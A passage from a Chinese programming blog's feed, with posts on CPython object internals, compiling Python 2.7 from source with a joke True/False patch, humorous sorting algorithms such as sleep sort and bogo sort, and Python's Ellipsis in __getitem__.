<code>PyVarObject</code> 就是 <code>PyObject</code> 的一个拓展,于是,<strong>在 Python 中,所有的对象都可以通过 <code>PyObject *</code> 指针来引用</strong>,这一点非常重要,它使得很多操作变得统一(这篇博客暂不详述)。</p><p>由此,Python 中所有对象在实现的时候,内存无非如下两种情况:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> 定长对象 变长对象</span><br><span class="line">+-----------+ +-----------+</span><br><span class="line">| ob_refcnt | | ob_refcnt |</span><br><span class="line">+-----------+ +-----------+</span><br><span class="line">| ob_type | | ob_type |</span><br><span class="line">+-----------+ +-----------+</span><br><span class="line">| | | ob_size |</span><br><span class="line">| | +-----------+</span><br><span class="line">| other | | |</span><br><span class="line">| | | other |</span><br><span class="line">| | | |</span><br><span class="line">+-----------+ +-----------+</span><br></pre></td></tr></table></figure><hr><h2 id="道生一:PyTypeObject"><a href="#道生一:PyTypeObject" class="headerlink" title="道生一:PyTypeObject"></a>道生一:PyTypeObject</h2><p>在描述 <code>PyObject</code> 的时候,提到了一个 <code>_typeobject</code> 结构体。那么,它是干什么的呢?想象一下,一个对象在创建的时候需要多少内存、这个对象的类名是什么等等信息,又是如何记录和区分的呢?</p><p><code>_typeobject</code>(也就是<code>PyTypeObject</code>)可以被称之为“指定对象类型的类型对象”,其定义如下:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> _<span class="title">typeobject</span> {</span></span><br><span class="line"> PyObject_VAR_HEAD</span><br><span class="line"> <span class="keyword">const</span> <span class="keyword">char</span> *tp_name; <span class="comment">/* For printing, in format "<module>.<name>" */</span></span><br><span class="line"> Py_ssize_t tp_basicsize, tp_itemsize; <span class="comment">/* For allocation */</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">// ...... 省略部分暂时不关心的内容</span></span><br><span class="line"></span><br><span class="line">} PyTypeObject;</span><br></pre></td></tr></table></figure><p>可以理解为,<code>PyTypeObject</code> 对象是 Python 中面向对象理念中“类”这个概念的实现,这里只是简单介绍其定义中的部分内容:</p><ul><li>ty_name:类型名</li><li>tp_basicsize, tp_itemsize:创建类型对象时分配的内存大小信息</li><li>被省略掉的部分:与该类型关联的操作(函数指针)</li></ul><p>这里只是简单描述,上面的内容有些偏颇,暂不必过分深究。</p><p>再看一眼 <code>PyTypeObject</code> 的定义,可以发现在最开始也有一个 <code>PyObject_VAR_HEAD</code>,这意味着它也是一个对象。那么,<code>PyTypeObject</code> 既然是指示类型的对象,那么它的类型又是什么呢?答案是 <code>PyType_Type</code>:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">PyTypeObject PyType_Type = {</span><br><span class="line"> PyVarObject_HEAD_INIT(&PyType_Type, 0)</span><br><span class="line"> "type", /* tp_name */</span><br><span class="line"> sizeof(PyHeapTypeObject), /* tp_basicsize */</span><br><span class="line"> sizeof(PyMemberDef), /* tp_itemsize */</span><br><span class="line"> (destructor)type_dealloc, /* tp_dealloc */</span><br><span class="line"> // ...... 省略了部分内容</span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>事实上,它就是 Python 语言中的 <code>type</code> 对象就是 <code>PyType_Type</code>,它是所有 class 的 class,在 Python 中叫做 metaclass。其实,在实现中它的 <code>ob_type</code> 指针又指向了自己本身,既是:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> PyType_Type</span><br><span class="line">+-----------+<-------+</span><br><span class="line">| ob_refcnt | |</span><br><span class="line">+-----------+ |</span><br><span class="line">| ob_size +--------+</span><br><span class="line">+-----------+</span><br><span class="line">| |</span><br><span class="line">| other |</span><br><span class="line">| |</span><br><span class="line">+-----------+</span><br></pre></td></tr></table></figure><hr><h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>简单概述了 Python 中的对象的最模糊的概念。</p>]]></content>
<summary type="html">
<p>在 Python 的世界中,一切皆对象。 int / list / dict / … 都是对象,除此之外,函数、类本身也是对象,那么,这些对象究竟是什么呢?</p>
<p>从结果看,Python 中的对象是 C 语言中结构体在堆上申请的一片内存区域。而在具体实现上,这里先简单描述一下。<br><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/07/09/987200237.png" alt="obj"></p>
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>从源码编译 Python</title>
<link href="https://xlzd.me/2016/08/22/compile-py/"/>
<id>https://xlzd.me/2016/08/22/compile-py/</id>
<published>2016-08-22T13:55:54.000Z</published>
<updated>2019-05-14T06:33:49.575Z</updated>
<content type="html"><![CDATA[<p>尝试通过源码自己编译 Python,使用的系统是 Ubuntu14.04 LTS。</p><p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/07/08/561824476.png" alt="python-back.png"></p><a id="more"></a><p>首先去官网下载源码,地址:<a href="https://www.python.org/downloads/source/" target="_blank" rel="noopener">源码下载</a>。下载完成之后,解压源码:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tar -zxvf Python-2.7.12.tgz</span><br></pre></td></tr></table></figure></p><p>可以看到目录结构如下:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">.</span><br><span class="line">├── aclocal.m4</span><br><span class="line">├── config.guess</span><br><span class="line">├── config.sub</span><br><span class="line">├── configure</span><br><span class="line">├── configure.ac</span><br><span class="line">├── Demo</span><br><span class="line">├── Doc</span><br><span class="line">├── Grammar</span><br><span class="line">├── Include</span><br><span class="line">├── install-sh</span><br><span class="line">├── Lib</span><br><span class="line">├── LICENSE</span><br><span class="line">├── Mac</span><br><span class="line">├── Makefile.pre.in</span><br><span class="line">├── Misc</span><br><span class="line">├── Modules</span><br><span class="line">├── Objects</span><br><span class="line">├── Parser</span><br><span class="line">├── PC</span><br><span class="line">├── PCbuild</span><br><span class="line">├── pyconfig.h.in</span><br><span class="line">├── Python</span><br><span class="line">├── README</span><br><span class="line">├── RISCOS</span><br><span class="line">├── setup.py</span><br><span class="line">└── Tools</span><br></pre></td></tr></table></figure><p>其中,我们比较关注的几个目录是:</p><ul><li>Include: 这个目录包括了 Python 的所有头文件。</li><li>Lib:这里是 Python 标准库,都是用 Python 实现的。</li><li>Modules:用 C 语言编写的模块,比如 cStringIO / tkinter 等。</li><li>Objects:Python 内建对象,如 int / list 等。</li><li>Python:Python 解释器的 Compiler 和执行引擎。</li><li>Parser:Python 解释器的 Scanner 和 Parser。</li></ul><p>我并不只是想尝试简单的通过源码编译安装,那么,在编译之前,我们先对它做一点小小的改动吧。今天先不做太复杂的事情,尝试一下“颠倒黑白”吧。所谓颠倒黑白,就是在输出(只有输出时)bool 型变量时,将 True/False 对调。关于输出 bool 变量的 C 语言实现,在 Objects/boolobject.c 的第 7-14 行,如下:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"> <span class="keyword">static</span> <span class="keyword">int</span></span><br><span class="line">bool_print(PyBoolObject *self, FILE *fp, <span class="keyword">int</span> flags)</span><br><span class="line">{</span><br><span class="line"> Py_BEGIN_ALLOW_THREADS</span><br><span class="line"> <span class="built_in">fputs</span>(self->ob_ival == <span class="number">0</span> ? <span class="string">"False"</span> : <span class="string">"True"</span>, fp);</span><br><span class="line"> Py_END_ALLOW_THREADS</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>可以看出,对于输出 True 还是 False 的判断是用三元运算符 <code>self->ob_ival == 0 ? "False" : "True"</code>,那么,其实改动就非常容易了:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fputs(self->ob_ival != 0 ? "False" : "True", fp);</span><br></pre></td></tr></table></figure><p>将比较运算符做一点小改动,就“颠倒黑白”啦。然后执行:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">./configure --prefix=/path/u/what/to/install</span><br><span class="line">make</span><br><span class="line">make install</span><br></pre></td></tr></table></figure></p><p>第一条命令的 <code>--prefix=</code> 后面是你想要安装的位置,你可以自行调整。等待运行完毕,就安装好啦,进入指定的目录,目录结构如下:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">.</span><br><span class="line">├── bin</span><br><span class="line">├── include</span><br><span class="line">├── lib</span><br><span class="line">└── share</span><br></pre></td></tr></table></figure><p>想要运行的话,执行 <code>bin/python</code> 即可,你也可以将其加入到 PATH 中,不过还是不建议去搞乱系统那个。好了,用我们自己编译的解释器执行几条语句吧:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">>>> print True</span><br><span class="line">False</span><br><span class="line"></span><br><span class="line">>>> print False</span><br><span class="line">True</span><br><span class="line"></span><br><span class="line">>>> print 3 > 5 </span><br><span class="line">True</span><br><span class="line"></span><br><span class="line">>>> print 1 == 2</span><br><span class="line">True</span><br></pre></td></tr></table></figure><p>很明显,已经“颠倒黑白”啦。</p>]]></content>
<summary type="html">
<p>尝试通过源码自己编译 Python,使用的系统是 Ubuntu14.04 LTS。</p>
<p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/07/08/561824476.png" alt="python-back.png"></p>
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>几种无用但有趣的排序算法</title>
<link href="https://xlzd.me/2016/07/07/sp-sort/"/>
<id>https://xlzd.me/2016/07/07/sp-sort/</id>
<published>2016-07-06T20:03:54.000Z</published>
<updated>2019-05-14T06:33:49.583Z</updated>
<content type="html"><![CDATA[<p> 常见的排序算法——诸如快排、堆排或归并等——都是基于比较的,除了这种正统意义上的排序算法,最近了解了几种令人啼笑皆非的排序算法,与大家分享一下。虽然这些算法都基本不可能用到生产环境,不过,平时拿出来恶搞一下还是比较有意思的。</p><p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/03/14/476167382.png" alt="New sorted logo.png"></p><a id="more"></a><h3 id="意大利面条排序-Spaghetti-Sort"><a href="#意大利面条排序-Spaghetti-Sort" class="headerlink" title="意大利面条排序(Spaghetti Sort)"></a>意大利面条排序(Spaghetti Sort)</h3><p> 意大利面条排序(Spaghetti Sort)的思路是,将输入分别对应到不同长度的面条上,每根面条的长度即为对应的数字的大小。比如,对于<code>[1, 4, 2, 8, 9]</code>这个输入,则分别做出长度为1cm、4cm、2cm、8cm、9cm的面条。然后,将这些面条的一头对其,用手抓住,另一头向下。然后慢慢地将手向下垂直下降,第一个触碰到桌面的面条对应的数字则为最大的数字,第二个触碰到的就是第二大的,依次类推。</p><h3 id="睡眠排序-Sleep-Sort"><a href="#睡眠排序-Sleep-Sort" class="headerlink" title="睡眠排序(Sleep Sort)"></a>睡眠排序(Sleep Sort)</h3><p> 睡眠排序(Sleep Sort)可以认为是意大利面条排序的计算机实现。它的算法思路是:对于输入数组<code>array</code>,开辟<code>array.length</code>个线程,对于数组中的每个元素,则对应一个线程,这个线程在睡眠所表示数字的长度之后,再将自己所对应的数字报出来即可。比如对于上面的输入<code>[1, 4, 2, 8, 9]</code>,则开辟5个线程,分别睡眠1s、4s、2s、8s、9s。这个算法虽然不太可能应用到真实开发中,不过却真的可以通过代码实现: </p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># encoding=utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> multiprocessing.dummy <span class="keyword">import</span> Pool <span class="keyword">as</span> ThreadPool</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> sleep</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sleep_sort</span><span class="params">(array)</span>:</span></span><br><span class="line"> rst_list = []</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">task</span><span class="params">(n)</span>:</span></span><br><span class="line"> sleep(n / <span class="number">1000.</span>)</span><br><span class="line"> rst_list.append(n)</span><br><span class="line"></span><br><span class="line"> pool = ThreadPool(len(array))</span><br><span class="line"> pool.map(task, array)</span><br><span class="line"> pool.close()</span><br><span class="line"> pool.join()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> rst_list</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> <span class="keyword">print</span> sleep_sort([<span class="number">10</span>, <span class="number">4</span>, <span class="number">7</span>, <span class="number">2</span>, <span class="number">1</span>, <span class="number">5</span>, <span class="number">9</span>, <span class="number">8</span>, <span class="number">3</span>, <span class="number">6</span>])</span><br></pre></td></tr></table></figure><h3 id="猴子排序-Bogo-Sort"><a href="#猴子排序-Bogo-Sort" class="headerlink" title="猴子排序(Bogo Sort)"></a>猴子排序(Bogo Sort)</h3><p> 如下关于猴子排序(Bogo Sort)的描述摘自<a href="https://zh.wikipedia.org/wiki/Bogo%E6%8E%92%E5%BA%8F" target="_blank" rel="noopener">维基百科</a>:</p><blockquote><p>在计算机科学中,Bogo排序(Bogo-Sort)是个既不实用又原始的排序算法,其原理等同将一堆卡片抛起,落在桌上后检查卡片是否已整齐排列好,若非就再抛一次。其名字源自Quantum bogodynamics,又称bozo sort、blort sort或猴子排序(参见<a href="https://zh.wikipedia.org/wiki/%E7%84%A1%E9%99%90%E7%8C%B4%E5%AD%90%E5%AE%9A%E7%90%86" target="_blank" rel="noopener">无限猴子定理</a>)。</p></blockquote><p> 所谓<em>无限猴子定理</em>,即是:让一只猴子在打字机上随机地按键,当按键时间达到无穷时,几乎必然能够打出任何给定的文字,比如莎士比亚的全套著作。</p><p> 猴子排序的Python实现如下:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> random <span class="keyword">import</span> shuffle</span><br><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> izip, tee</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">in_order</span><span class="params">(array)</span>:</span></span><br><span class="line"> it1, it2 = tee(array)</span><br><span class="line"> it2.next()</span><br><span class="line"> <span class="keyword">return</span> all(a<=b <span class="keyword">for</span> a,b <span class="keyword">in</span> izip(it1, it2))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">bogo_sort</span><span class="params">(array)</span>:</span></span><br><span class="line"> <span class="keyword">while</span> <span class="keyword">not</span> in_order(array):</span><br><span class="line"> shuffle(array)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> <span class="keyword">print</span> bogo_sort([<span class="number">10</span>, <span class="number">4</span>, <span class="number">1</span>, <span class="number">5</span>, <span class="number">9</span>, <span class="number">8</span>, <span class="number">3</span>, <span class="number">6</span>])</span><br></pre></td></tr></table></figure></p><p> 如果传入的是已排序的数组,猴子排序可以直接返回结果。如果不是已排序的数组,猴子排序的平均时间复杂度为O(n*n!),最优情况下只需要一次shuffle操作,但是最差情况下则需要无限久的时间。所以,这种排序算法,基本大家就在吹牛的时候说说就好了,写在代码里,基本上就是分分钟被打死的后果。</p><h3 id="量子猴排-Quantum-Bogo-Sort"><a href="#量子猴排-Quantum-Bogo-Sort" class="headerlink" title="量子猴排(Quantum Bogo Sort)"></a>量子猴排(Quantum Bogo Sort)</h3><p> 量子猴排(Quantum Bogo Sort)可以算是<u>概念上</u>对猴子排序的一种优化:洗牌的时候,使用量子化随机排列(quantumly randomized)。这样的话,我们在观测这组数之前,这组数的状态是叠加的,参见<a href="https://en.wikipedia.org/wiki/Schr%C3%B6dinger%27s_cat?oldformat=true" target="_blank" rel="noopener">Schrรถdinger’s cat</a>。通过这种量子化随机排列,我们划分出来了个平行宇宙。接下来,在某个宇宙A中,观测一下这组数,发现运气不好,没有排序好,那么我们就销毁掉这个宇宙。然后再看看其他宇宙的运气怎么样。终于,在一个宇宙Z中,发现刚好是排好序的数组。那么我们就保留这个宇宙。最后,没有被销毁的宇宙中,数组都是恰好一次被排好序的。</p><p> 量子猴排的时间复杂度是O(n)。</p><h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h3><p> 几种无用蛋疼但是有趣的排序算法~~~</p>]]></content>
<summary type="html">
<p> 常见的排序算法——诸如快排、堆排或归并等——都是基于比较的,除了这种正统意义上的排序算法,最近了解了几种令人啼笑皆非的排序算法,与大家分享一下。虽然这些算法都基本不可能用到生产环境,不过,平时拿出来恶搞一下还是比较有意思的。</p>
<p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2016/03/14/476167382.png" alt="New sorted logo.png"></p>
</summary>
<category term="nonsense" scheme="https://xlzd.me/tags/nonsense/"/>
</entry>
<entry>
<title>优雅的 Python 之 Ellipsis</title>
<link href="https://xlzd.me/2016/05/30/ellipsis/"/>
<id>https://xlzd.me/2016/05/30/ellipsis/</id>
<published>2016-05-30T01:41:55.000Z</published>
<updated>2019-05-14T06:33:49.575Z</updated>
<content type="html"><![CDATA[<p>Python 是一门非常具有包容性的语气,体现在一个优秀的工程师可以非常容易优雅高效地完成一件事情,而一个拙略的工程师通过<del>屎</del>一样的代码同样可以做到几乎一样的功能。今天,介绍一下 Python 的 Ellipsis~~~</p><p>想象这样一个问题:</p><blockquote><p>如何优雅地生成一个等差数组?比如输入一个序列的第一、第二项以及最后一项,然后返回这个等差数组。</p></blockquote><a id="more"></a><p>这里指的优雅并不是实现代码上,而是调用方式优雅。那么,在具体实现之前,我们先看一眼调用的方式吧:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">In [<span class="number">1</span>]: gen = SeqGenerator()</span><br><span class="line"></span><br><span class="line">In [<span class="number">2</span>]: gen[<span class="number">1</span>, <span class="number">2</span>, ..., <span class="number">9</span>]</span><br><span class="line">[<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>, <span class="number">7</span>, <span class="number">8</span>, <span class="number">9</span>]</span><br><span class="line"></span><br><span class="line">In [<span class="number">3</span>]: gens[<span class="number">20</span>, <span class="number">16</span>, ..., <span class="number">0</span>]</span><br><span class="line">[<span class="number">20</span>, <span class="number">16</span>, <span class="number">12</span>, <span class="number">8</span>, <span class="number">4</span>, <span class="number">0</span>]</span><br></pre></td></tr></table></figure><p>有意思吧,这样直观的方式调用,简单明了。下面简单聊聊实现原理吧。</p><p>其实,在 <code>object</code> 对象中,有一个 <code>__getitem__</code> 方法。你可以做如下测试:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">In [<span class="number">1</span>]: <span class="class"><span class="keyword">class</span> <span class="title">Test</span><span class="params">(object)</span>:</span></span><br><span class="line"> ....: <span class="function"><span class="keyword">def</span> <span class="title">__getitem__</span><span class="params">(self, item)</span>:</span></span><br><span class="line"> ....: <span class="keyword">print</span> item</span><br><span class="line"></span><br><span class="line">In [<span class="number">2</span>]: t = Test()</span><br><span class="line"></span><br><span class="line">In [<span class="number">2</span>]: t[<span class="number">1</span>]</span><br><span class="line"><span class="number">1</span></span><br><span class="line"></span><br><span class="line">In [<span class="number">3</span>]: t[<span class="string">'what the fuck'</span>]</span><br><span class="line">what the fuck</span><br><span class="line"></span><br><span class="line">In [<span class="number">4</span>]: t[:]</span><br><span class="line">slice(<span class="keyword">None</span>, <span class="keyword">None</span>, <span class="keyword">None</span>)</span><br><span class="line"></span><br><span class="line">In [<span class="number">5</span>]: t[<span class="number">1</span>: <span class="number">10</span>]</span><br><span class="line">slice(<span class="number">1</span>, <span class="number">10</span>, <span class="keyword">None</span>)</span><br><span class="line"></span><br><span class="line">In [<span class="number">6</span>]: t[<span class="number">1</span>:<span class="number">3</span>:<span class="number">5</span>]</span><br><span class="line">slice(<span class="number">1</span>, <span class="number">3</span>, <span class="number">5</span>)</span><br><span class="line"></span><br><span class="line">In [<span class="number">7</span>]: t[<span class="number">1</span>, <span class="number">2</span>]</span><br><span class="line">(<span class="number">1</span>, <span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">In [<span class="number">8</span>]: t[<span class="number">1</span>, <span class="number">2</span>, ..., <span class="number">5</span>]</span><br><span class="line">(<span class="number">1</span>, <span class="number">2</span>, <span class="built_in">Ellipsis</span>, <span class="number">5</span>)</span><br></pre></td></tr></table></figure><p>可以看到,第八行的调用方式与上面产生等差数列的方式基本是一样的了,但是返回的内容( <code>Test</code> 中事实上并没有返回,只是直接 <code>print</code> 了)不同,多了一个 <code>Ellipsis</code>。</p><p>那么,对应上面的 <code>SeqGenerator</code> 的实现就一目了然了:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">SeqGenerator</span><span class="params">(object)</span>:</span></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__getitem__</span><span class="params">(self, item)</span>:</span></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> (isinstance(item, tuple) <span class="keyword">and</span> len(item) == <span class="number">4</span> <span class="keyword">and</span> item[<span class="number">2</span>] <span class="keyword">is</span> <span class="built_in">Ellipsis</span>):</span><br><span class="line"> <span class="keyword">raise</span> RuntimeError(<span class="string">'what the fuck'</span>)</span><br><span class="line"> <span class="keyword">return</span> range(item[<span class="number">0</span>], (item[<span class="number">-1</span>]+<span class="number">1</span>, item[<span class="number">-1</span>]<span class="number">-1</span>)[item[<span class="number">0</span>]>item[<span class="number">1</span>]], item[<span class="number">1</span>]-item[<span class="number">0</span>])</span><br></pre></td></tr></table></figure><p>然后就可以愉快地按照上面的示例一样调用啦。当然,上面的实现比较简单,没有完整地考虑到各种情况,如果你愿意,可以自行解决之~~~</p>]]></content>
<summary type="html">
<p>Python 是一门非常具有包容性的语气,体现在一个优秀的工程师可以非常容易优雅高效地完成一件事情,而一个拙略的工程师通过<del>屎</del>一样的代码同样可以做到几乎一样的功能。今天,介绍一下 Python 的 Ellipsis~~~</p>
<p>想象这样一个问题:</p>
<blockquote>
<p>如何优雅地生成一个等差数组?比如输入一个序列的第一、第二项以及最后一项,然后返回这个等差数组。</p>
</blockquote>
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
</feed>